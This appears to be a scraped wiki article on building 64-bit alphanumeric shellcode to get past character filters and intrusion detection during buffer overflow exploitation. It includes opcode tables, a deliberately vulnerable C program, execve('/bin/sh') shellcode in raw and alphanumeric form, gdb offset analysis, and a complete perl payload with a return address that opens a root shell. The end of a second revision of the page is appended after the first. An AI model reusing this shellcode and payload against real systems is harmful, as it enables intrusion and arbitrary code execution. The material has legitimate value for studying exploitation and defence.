| pop %cx<br />
| \x66\x59<br />
| fY<br />
|-<br />
| pop %dx<br />
| \x66\x5a<br />
| fZ<br />
|-<br />
| pop *%r8w<br />
| \x66\x41\x58<br />
| fAX<br />
|-<br />
| pop *%r9w<br />
| \x66\x41\x59<br />
| fAY<br />
|-<br />
| pop *%r10w<br />
| \x66\x41\x5a<br />
| fAZ<br />
|}<br />
<br />
Using push and pop the values of 6 fullsize CPU registers can be set:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%r8<br />
*%r9<br />
*%r8<br />
<br />
Or get any values of 16 fullsize CPU registers to the top of the stack:<br />
<br />
*%r8-%r15<br />
*%rax-%rdi<br />
<br />
== Prefixes ==<br />
<br />
Examining this next section, there are 5 main registers, and 5 special 64 bit registers that can be push(ed), but not pop(ed):<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop. Using only the registers already accessed, an attempt will be made to get instructions for to set values.<br />
<br />
The special register prefix has been identified:<br />
<br />
0x41, 'A'<br />
<br />
The word operand override has been identified, <br />
<br />
0x66, 'f'.<br />
<br />
Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.<br />
<br />
{| class="wikitable"<br />
! Hex Value<br />
! Alpha Value<br />
! Description<br />
|-<br />
| 0x36<br />
| 6<br />
| %ss segment override<br />
|-<br />
| 0x64<br />
| d<br />
| %fs segment override<br />
|-<br />
| 0x65<br />
| e<br />
| %gs segment override<br />
|-<br />
| 0x66<br />
| f<br />
| 16-bit operand size<br />
|-<br />
| 0x67<br />
| g<br />
| 16-bit address size<br />
|-<br />
| 0x41<br />
| A<br />
| 64-bit special register use (%r##)<br />
|-<br />
| 0x48<br />
| H<br />
| 64-bit register size override<br />
|-<br />
| 0x40-4f<br />
| B-P<br />
| Special 64-bit overrides<br />
|}<br />
<br />
== Operands ==<br />
<br />
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, take this xor instruction:<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte](%rax),%ebx</syntaxhighlight><br />
| \x33\x58\x##<br />
| 3X?<br />
|}<br />
<br />
The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) opcode:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte](%rcx),%ebx</syntaxhighlight><br />
| \x33\x59\x##<br />
| 3Y?<br />
|}<br />
<br />
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
|<syntaxhighlight lang="asm">xor $0x[byte]({reg}),%ebx</syntaxhighlight><br />
| \x33\x??\x##<br />
| 3*?<br />
|}<br />
<br />
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.<br />
<br />
== The rbx, rsp, and rbp registers ==<br />
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:<br />
* %ebx<br />
* %bx<br />
* %bh<br />
* %bl<br />
<br />
Apon further investigation, this opened up access to multiple additional registers using:<br />
*Xor<br />
*Imul<br />
*Movslq<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte]({reg64}),{reg32}</syntaxhighlight><br />
| \x33\x??\x#1<br />
| 3*1<br />
|-<br />
| <source lang="asm">imul $0x[dword1],0x[byte2]({reg64}),{reg32}</source><br />
| \x69\x??\x#2\x#1\x#1\x#1\x#1<br />
| i*21111<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}), {reg32}</source><br />
| \x6b\x??\x#2\x#1<br />
| k*21<br />
|-<br />
| <source lang="asm">movslq 0x[byte1]({reg64}), {reg32}</source><br />
| \x63\x??\x#1<br />
| c*1<br />
|}<br />
<br />
To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?"). If preferred to use the special 64 bit registers, <br />
0x41 or "A" is placed at the beginning of the bytecode. If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used. When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}),{reg64}</source><br />
| \x48\x6b\x??\x#2\x#1<br />
| Hk*21<br />
|}<br />
<br />
To set the value of %rbx directly, imul, xor, and movslq can be used. It's similar for other registers:<br />
* %rbp<br />
* %rsp<br />
<br />
==Xor==<br />
Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, at 0x30 and ending at 0x35 are these valuable xor commands:<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x34<br />
| <syntaxhighlight lang="asm">xor $0x##, %al</syntaxhighlight><br />
|-<br />
| 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %eax</syntaxhighlight><br />
|-<br />
| 0x48 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %rax</syntaxhighlight><br />
|}<br />
<br />
'''0x30''' is a multi-byte xor instruction. Requiring at least two operands (even if register denote):<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x30<br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},2)</syntaxhighlight><br />
|}<br />
<br />
'''0x31''' is as flexible as '''0x30'''. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x31<br />
| <syntaxhighlight lang="asm">xor %{32bit}, (%{64bit})</syntaxhighlight><br />
|}<br />
<br />
'''0x32''' is just as flexible, although the offsets will change source side rather than destination side. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x32<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{16bit}</syntaxhighlight><br />
|}<br />
<br />
'''0x33''' is the opposite of 0x31 and as flexible. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x33<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{32bit}</syntaxhighlight><br />
|}<br />
<br />
== The rsi and rdi registers ==<br />
<br />
Combining the knowledge of xor with the knowledge of the stack. When any data is pushed, the data is accessible at %ss:(%rsp). Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
First, utilise push and pop to simulate 'mov':<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp; \x54<br />
pop %rcx; \x59<br />
pop %rax; \x5a (This just sets the pointer back)<br />
</syntaxhighlight>}}<br />
<br />
Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi; \x56<br />
xor %ss:(%rcx), %rsi; \x36\x48\x33\x31<br />
pop %r8; \x41\x58 <br />
push %rdi; \x57<br />
xor %ss:(%rcx), %rdi; \x36\x48\x33\x39<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%rsi<br />
*%rdi<br />
*%r8<br />
*%r9<br />
*%r10<br />
*%r14<br />
*%r15<br />
<br />
So far, in this sample, full control has not been utilized over:<br />
<br />
*%rsp<br />
*%rbp<br />
*%rbx<br />
*%r11<br />
*%r12<br />
*%r13<br />
<br />
Similar to push, controllable data is required before the setting of a register. Where pop is concerned, something might be required to be pushed to the stack first, in this case, only the zero register is required. Due to the way that XOR works, once a zero is registered at all, in this case %rax is used as the zero register, it can be used to get %rbx, %rsp, and %rbp to zero if needed:<br />
<br />
To get %rbx:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax; store that value in rax<br />
xor %rax, %ss:0x30(%rcx); Null that area of stack<br />
imul $0x30,%ss:0x30(%rax),%rbx; 0x30 * 0 = 0 <br />
imul $0x30,%ss:0x30(%rax),%rbp; 0x30 * 0 = 0<br />
</syntaxhighlight>}}<br />
<br />
Once the stack space, as well as the destination is set to zero, %rax, %rbp can effectively be mov(ed):<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rax,%ss:0x30(%rcx); 36 48 31 41 30<br />
xor %ss:0x30(%rcx),%rbp; 36 48 33 69 30<br />
</syntaxhighlight>}}<br />
<br />
The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1,2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov :<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
movslq %ss:0x30(%rcx), %rsi<br />
xor %rsi, %ss:0x30(%rsi)<br />
</syntaxhighlight>}}<br />
<br />
This can come in quite handy when chunking large pieces of data to 0.<br />
<br />
==Example: Zeroing Out x86_64 CPU Registers==<br />
<br />
First %rsp is pushed to the top of the stack and the pointer address is popped into in %rcx, the third pop is to ensure that the pointer address matches what is now in %rcx.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp<br />
pop %rcx<br />
pop %r8 <br />
</syntaxhighlight>}}<br />
<br />
The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring itself, and %rsp is then set back to %rcx using pop. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi<br />
xor %ss:(%rcx), %rsi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
xor %ss:(%rcx), %rdi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Zeroing out RDX is much simpler.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
pop %rdx<br />
</syntaxhighlight>}}<br />
<br />
The following push and pop sets %rax to 0x30. %al is the lowest order 8 bit subregister of %rax. Since 0x30 resides in %al, the xor effectively zeroes out $rax.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push $0x30<br />
pop %rax<br />
xor $0x30, %al<br />
</syntaxhighlight>}}<br />
<br />
For %rbx and %rbp we xor %ss:0x30(%rcx), which is first zeroed out, against each register and then xor the register against %ss:0x30(%rcx), which results in each register being zeroed out.<br />
<br />
Zero out the %ss:0x30(%rcx) stack segment.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
xor %rbx into the stack segment and then xor it against rbx to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbx, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbx<br />
</syntaxhighlight>}}<br />
<br />
Rezero the stack segment with %rax. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdx<br />
pop %rax<br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
As before, xor %rbp into the stack segment and then xor it against rbp to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbp, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbp<br />
</syntaxhighlight>}}<br />
<br />
= 64 bit shellcode: Conversion to alphanumeric code =<br />
* Because of the limited instruction set, the conversion requires many '''mov emulations''' via '''xor''', '''mul''', '''movslq''', '''push''', and '''pop'''.<br />
== bof.c ==<br />
{{info|This is a modified version of bof.c to allow for 200 bytes because the length of the final shellcode exceeds 100 bytes.}}<br />
{{code|text=<source lang="c"><br />
#include <stdlib.h><br />
#include <stdio.h><br />
#include <string.h><br />
<br />
int main(int argc, char *argv[]){<br />
char buffer[200];<br />
strcpy(buffer, argv[1]);<br />
return 0;<br />
}<br />
</source>}}<br />
<br />
== Starting shellcode (64-bit execve /bin/sh) ==<br />
{{info|This was converted to shellcode from the example in 64 bit linux assembly}}<br />
* execve('/bin/sh');<br />
{{code|text=<source lang="asm"><br />
.section .data<br />
.section .text<br />
.globl _start<br />
_start:<br />
<br />
# a function is f(%rdi, %rsi, %rdx, %rcx, %r8, %r9).<br />
# Use zeroed memory to zero out %rsi, %rdi, %rdx<br />
xor %rdi, %rdi<br />
push %rdi<br />
push %rdi<br />
pop %rsi<br />
pop %rdx<br />
<br />
# Store '/bin/sh\0' in %rdi<br />
movq $0x68732f6e69622f6a, %rdi<br />
shr $0x8,%rdi<br />
push %rdi<br />
push %rsp<br />
pop %rdi<br />
push $0x3b<br />
pop %rax<br />
syscall # execve('/bin/sh', null, null)<br />
# function no. is 59/0x3b - execve()<br />
</source>}}<br />
<br />
* execve('/bin/sh') <br />
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"<br />
<br />
== Shellcode Analysis ==<br />
'''Immediately before the syscall:'''<br />
* %rax is set to 0x3b<br />
* %rdi is a pointer to '/bin/sh\0'<br />
* %rsi and %rdx are null<br />
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code. The '''xor''' and '''imul''' instructions can then be used to set values on registers.<br />
<br />
==Stack Analysis==<br />
{{info|These buffer dumps have been shortened for brevity and readability.}}<br />
[root@ares bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r $(perl -e 'print "A"x232;')<br />
Starting program: /home/hatter/bha/bof $(perl -e 'print "A"x232;')<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x0000000000400525 in main ()<br />
(gdb) x/500x $rsp <br />
'''0x7fffffffe3c8''': 0x41414141 0x41414141 0x41414141 0x41414141<br />
0x7fffffffe3d8: 0xffffe400 0x00007fff 0x00000000 0x00000002<br />
..........................<br />
0x7fffffffe708: 0x2f656d6f 0x68726f76 0x2f736565 0x2f616862<br />
0x7fffffffe718: 0x00666f62 '''0x41414141 0x41414141 0x41414141'''<br />
0x7fffffffe728: '''0x41414141 0x41414141 0x41414141 0x41414141'''<br />
<br />
* The formula to determine the offset to begin overwriting data from the stack pointer is '''([[return address]] + [[shellcode]] length) - %rsp'''.<br />
{| class="wikitable"<br />
|-<br />
|'''Operation'''<br />
|<b>Value</b><br />
|<b>Comments</b><br />
|-<br />
|<center><br />
<br />
<br />
'''+'''<br />
<br />
'''-'''</center><br />
|0x7fffffffe726<br />
<br />
0x71<br />
<br />
0x7fffffffe3c8 <br />
|<br />
:[[return address]]<br />
<br />
:[[shellcode]] length (113 characters) <br />
<br />
:%rsp<br />
|-<br />
<br />
|-<br />
|<center>'''='''</center><br />
|<b>0x3cf</b><br />
|<br />
:'''Calculated Offset from %rsp at time of overflow'''<br />
|-<br />
|}<br />
<br />
==The Offset==<br />
* To prepare for '''xor''' and '''imul''' manipulations, 0x5a is placed into %rax and %rsp is moved into %rcx.<br />
{{code|text=<source lang="asm"><br />
# Set %rcx as stack pointer <br />
# and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
</source>}}<br />
* Preparing for imul, an '''xor''' is used to place 0x0f into %rax, then push %rax to the stack.<br />
{{code|text=<source lang="asm"><br />
# Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax # 0x0f on the stack now.<br />
</source>}}<br />
<br />
* Because 0x41 * 0x0f = 0x3cf (975), the offset can be calculated in purely alphanumeric form. Modify this as code distances itself from the stack pointer during an exploit. The offset is stored in %rdi after setting back the stack pointer.<br />
{{code|text=<source lang="asm"><br />
pop %rax # add back to %esp<br />
imul $0x41, (%rcx), %edi # %rdi = 0x3cf, a "magic offset" for us<br />
</source>}}<br />
<br />
==The Syscall==<br />
* Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
* This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000. 0x0f05 is the machine code for a '''syscall'''.<br />
{{code|text=<source lang="asm"><br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
</source>}}<br />
<br />
* The %rax register now contains 0x050f. Put 0x0f050000 at (%rcx) - then set the stack pointer back.<br />
{{code|text=<source lang="asm"><br />
push %rax<br />
pop %rax # Garbage reg<br />
</source>}}<br />
<br />
* A '''mov emulation''' is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
==Arguments==<br />
===Stack Space===<br />
* Zero out a '''qword''' of data starting at %rcx + 0x30 (48 in decimal)<br />
{{code|text=<source lang="asm"><br />
# Allocate stack space<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
</source>}}<br />
<br />
===Register Initialization===<br />
* The %rdx, %rdi, and %rsi registers are used for the '''execve()''' syscall. These are zeroed out to initialize their values using the stack space previously allocated.<br />
{{code|text=<source lang="asm"><br />
# Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
</source>}}<br />
<br />
===String Argument===<br />
* '''/bin''' is placed onto the stack at the space allocated at %rcx + 0x30.<br />
{{code|text=<source lang="asm"><br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx)<br />
</source>}}<br />
* '''/sh\0''' is placed onto the stack at the space allocated at %rcx + 0x34.<br />
{{code|text=<source lang="asm"><br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) <br />
</source>}}<br />
* '''xor''' is used as a '''mov emulation''' to place '/bin/sh\0' into %rdi.<br />
{{code|text=<source lang="asm"><br />
xor 0x30(%rcx), %rdi<br />
</source>}}<br />
* Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rdi<br />
</source>}}<br />
<br />
===Final Registers===<br />
* %rsi and %rdx are '''0'''. First, push a byte to meet the sign requirement for '''movslq''', then zero %rdi.<br />
{{code|text=<source lang="asm"><br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi <br />
</source>}}<br />
* Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi. %rdi then contains a pointer to '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
</source>}}<br />
* %rax is set to 59 or '''0x3b''' for the '''execve()''' syscall.<br />
{{code|text=<source lang="asm"><br />
xor $0x63, %al<br />
</source>}}<br />
'''Final registers:'''<br />
* %rax = 0x3b<br />
* %rdi = pointer to '/bin/sh\0'<br />
* %rsi = null<br />
* %rdx = null<br />
<br />
==Final Code==<br />
* x86_64 alphanumeric execve('/bin/sh',null,null) - 111 bytes:<br />
'''jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c'''<br />
{{info|Some assemblers prefer the '#' character to the ';' character for comments. User may have to find and replace to get it to assemble properly.}}{{code|text=<source lang="asm"><br />
.global _start<br />
.text<br />
_start:<br />
; Set %rcx as stack pointer <br />
; and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
<br />
; Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax ; 0x14 on the stack now.<br />
pop %rax ; add back to %esp<br />
imul $0x41, (%rcx), %edi ; %rdi = 0x3cf, a "magic offset" for us<br />
; This is decimal value 975.<br />
; If this is too low/high, suggest a <br />
; modification to xor of %al for <br />
; changing the imul results<br />
<br />
; Write the syscall <br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1) ; 4 bytes have been nulled<br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
push %rax<br />
pop %rax ; Garbage reg<br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
<br />
; Sycall written, set values now.<br />
; allocate 8 bytes for '/bin/sh\0'<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
<br />
; Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
<br />
; Store '/bin/sh\0' in %rdi<br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx) ; '/bin' just went onto the stack<br />
<br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) ; '/sh\0' just went onto the stack<br />
xor 0x30(%rcx), %rdi ; %rdi now contains '/bin/sh\0'<br />
<br />
<br />
pop %rax<br />
push %rdi<br />
<br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi ; %rdi zeroed<br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
xor $0x63, %al</source>}}<br />
<br />
== Successful Overflow Test ==<br />
{{info|This [[shellcode]] was tested on a modified [[Buffer_Overflows#bof.c|bof.c]] to make the buffer 200 bytes in stead of 100 bytes, as the shellcode here exceeds the original buffer size.}}<br />
<br />
[user@host bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`<br />
Starting program: /home/hatter/bha/bof `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 .<br />
"\x26\xe7\xff\xff\xff\x7f";'`<br />
process 28444 is executing new program: /bin/bash<br />
[user@host bha]# uname -m<br />
x86_64<br />
[user@host bha]# exit<br />
exit<br />
[Inferior 1 (process 28444) exited normally]<br />
(gdb) <br />
{{exploitation}}{{programming}}{{social}}<br />
[[Category:Shellcode]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Alphanumeric_shellcode&diff=9078Alphanumeric shellcode2012-09-19T16:23:40Z<p>DPYJulietowbaijc: /* Alphanumeric opcode compatibility */</p>
<hr />
<div><center>'''Alphanumeric [[shellcode]]''' is similar to [[ascii shellcode]] in that it is used to [[filter bypass|bypass character filters]] and [[IDS evasion|evade intrusion-detection]] during [[Buffer Overflows|buffer overflow]] [[exploitation]].</center>{{info|<center>This article documents alphanumeric code on [[#15_Byte_Architecture_Detection_Shellcode|multiple architectures]], but primarily the '''64 bit''' x86 architecture.</center>}}<br />
{{prereq|[[bitwise math]], [[assembly]] and [[shellcode]].}}<br />
<br />
= Available x86_64 instructions =<br />
{{info|This chart contains '''64-bit''' alphanumeric opcodes. 32-bit alphanumeric opcodes are available at the 32-bit [[ascii shellcode]] entry. When limited only to instructions that have corresponding ascii characters; programmers must emulate other required instructions using only the instructions available.}}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Numeric<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0<br />
| 0x30<br />
| xor %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 1<br />
| 0x31<br />
| xor %{32bit}, (%{64bit})<br />
|-<br />
! scope="row" | 2<br />
| 0x32<br />
| xor (%{64bit}), %{16bit}<br />
|-<br />
! scope="row" | 3<br />
| 0x33<br />
| xor (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | 4<br />
| 0x34<br />
| xor [byte], %al<br />
|-<br />
! scope="row" | 5<br />
| 0x35<br />
| xor [dword], %eax<br />
|-<br />
! scope="row" | 6<br />
| 0x36<br />
| %ss segment register<br />
|-<br />
! scope="row" | 7<br />
| 0x37<br />
| Bad Instruction!<br />
|-<br />
! scope="row" | 8<br />
| 0x38<br />
| cmp %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 9<br />
| 0x39<br />
| cmp %{32bit}, (%{64bit})<br />
|-<br />
|}<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|-<br />
|+ Uppercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | A<br />
| 0x41<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | B<br />
| 0x42<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | C<br />
| 0x43<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | D<br />
| 0x44<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | E<br />
| 0x45<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | F<br />
| 0x46<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | G<br />
| 0x47<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | H<br />
| 0x48<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | I<br />
| 0x49<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | J<br />
| 0x4a<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | K<br />
| 0x4b<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | L<br />
| 0x4c<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | M<br />
| 0x4d<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | N<br />
| 0x4e<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | O<br />
| 0x4f<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | P<br />
| 0x50<br />
|push %rax<br />
|-<br />
! scope="row" | Q<br />
| 0x51<br />
|push %rcx<br />
|-<br />
! scope="row" | R<br />
| 0x52<br />
|push %rdx<br />
|-<br />
! scope="row" | S<br />
| 0x53<br />
|push %rbx<br />
|-<br />
! scope="row" | T<br />
| 0x54<br />
|push %rsp<br />
|-<br />
! scope="row" | U<br />
| 0x55<br />
|push %rbp<br />
|-<br />
! scope="row" | V<br />
| 0x56<br />
|push %rsi<br />
|-<br />
! scope="row" | W<br />
| 0x57<br />
|push %rdi<br />
|-<br />
! scope="row" | X<br />
| 0x58<br />
|pop %rax<br />
|-<br />
! scope="row" | Y<br />
| 0x59<br />
|pop %rcx<br />
|-<br />
! scope="row" | Z<br />
| 0x5a<br />
|pop %rdx<br />
|-<br />
|}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|-<br />
|+ Lowercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | a<br />
| 0x61<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | b<br />
| 0x62<br />
